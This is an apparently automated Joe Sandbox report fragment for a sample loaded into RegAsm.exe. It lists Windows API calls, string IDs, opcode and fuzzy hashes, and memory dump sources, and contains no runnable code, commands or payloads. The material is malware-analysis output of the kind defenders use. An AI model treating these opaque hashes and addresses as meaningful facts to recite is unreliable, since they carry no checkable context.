                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$CloseHandle
                                                                                • String ID: General
                                                                                • API String ID: 3722638380-26480598
                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                APIs
                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                • String ID:
                                                                                • API String ID: 764393265-0
                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                • String ID:
                                                                                • API String ID: 979780441-0
                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                APIs
                                                                                • memcpy.MSVCRT ref: 004134E0
                                                                                • memcpy.MSVCRT ref: 004134F2
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                • String ID:
                                                                                • API String ID: 1386444988-0
                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcschr$memcpywcslen
                                                                                • String ID: "
                                                                                • API String ID: 1983396471-123907689
                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfmemcpy
                                                                                • String ID: %2.2X
                                                                                • API String ID: 2789212964-323797159
                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf
                                                                                • String ID: %%-%d.%ds
                                                                                • API String ID: 3988819677-2008345750
                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E770
                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendmemset
                                                                                • String ID: F^@
                                                                                • API String ID: 568519121-3652327722
                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PlacementWindowmemset
                                                                                • String ID: WinPos
                                                                                • API String ID: 4036792311-2823255486
                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@DeleteObject
                                                                                • String ID: r!A
                                                                                • API String ID: 1103273653-628097481
                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID:
                                                                                • API String ID: 438689982-0
                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
• Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
• Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
• Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15

APIs
• memcmp.MSVCRT ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
• memcmp.MSVCRT ref: 00408B2B
• memcmp.MSVCRT ref: 00408B5C
• memcpy.MSVCRT ref: 00408B79

Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd

Similarity
• API ID: memcmp$memcpy
• String ID:
• API String ID: 231171946-0
• Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
• Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
• Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
• Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E

APIs

Memory Dump Source
• Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd

Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
• Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
• Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
• Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49